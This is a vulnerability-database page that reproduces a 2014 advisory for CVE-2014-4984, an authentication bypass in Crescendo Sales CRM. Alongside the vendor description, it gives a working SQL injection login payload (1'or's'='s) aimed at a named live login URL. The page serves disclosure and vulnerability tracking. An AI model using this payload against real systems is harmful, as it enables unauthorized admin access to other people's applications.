Vulners
Lucene search
Crescendo - Sales CRM SQL Injection
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | Crescendo - Sales CRM Authentication Bypass Vulnerability | 11 Aug 201400:00 | – | zdt |
 | CVE-2014-4984 | 10 Jan 202012:18 | – | cve |
 | CVE-2014-4984 | 10 Jan 202012:18 | – | cvelist |
 | EUVD-2014-4899 | 7 Oct 202500:30 | – | euvd |
 | CVE-2014-4984 | 10 Jan 202013:15 | – | nvd |
 | Sql injection | 10 Jan 202013:15 | – | prion |
 | PT-2020-7693 · Unknown · Déjà Vu Crescendo Sales Crm | 10 Jan 202000:00 | – | ptsecurity |
 | CVE-2014-4984 | 22 May 202513:35 | – | redhatcve |
`#################################################
Crescendo - Sales CRM Authentication Bypass Vulnerability
#################################################
# Exploit Title: Crescendo - Sales CRM Authentication Bypass Vulnerability
(Sql Injection)
# Google Dork: N/A
# Date: July 15 , 2014
# Exploit Author: Monendra Sahu ( [email protected] )
# Vendor Homepage: http://dejavuprotech.com/crecendo.php
# Tested on:Windows
# Browser Used : Google Chrome 35
# CVE: CVE-2014-4984
Vendor Information:
"Déjà Vu has introduced Crescendo – Sales CRM. Targeted towards Small &
Medium Enterprises, Crescendo is a low cost
hosted application. Crescendo is instrumental in streamlining the sales
processes like lead generation, lead tracking, lead
management, account management and keeps top management informed about the
sales pipeline. With user friendly
interface, Crescendo comes with various MIS reports represented in tabular
as well as graphical format. With the help of
Crescendo companies can take better, faster and informed decisions.
Crescendo - Sales CRM offers following modules:
Leads Management
Accounts Management
Contacts Management
Sales Forecasting
Pipeline Management
Teams Management
Targets Managements
Interactive Dashboards
Graphical & MIS Reports
Technologies employed for development of Crescendo - Sales CRM:
Front End: Asp.Net, Vb.Net
Database: MSSQL Server."
#################################################
Issue: SQL Injection, Authentication Bypass
Risk level: High
=> The remote attacker has the possibility to execute arbitrary SQL Code.
=> The remote attacker is able to bypass the Admin authentication.
Vulnerable Url : www.site.com/login.aspx
-------------------------------------
Exploit / Proof Of Concept:
Perform a login with the following data:
URL: http://www.crescendocrm.com/login.aspx
Login Name:1'or's'='s
Password:1'or's'='s
You will be able to successfully login into admin panel
-------------------------------------
#################################################
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Aug 2014 00:00Current
0.4Low risk
Vulners AI Score0.4
EPSS0.03503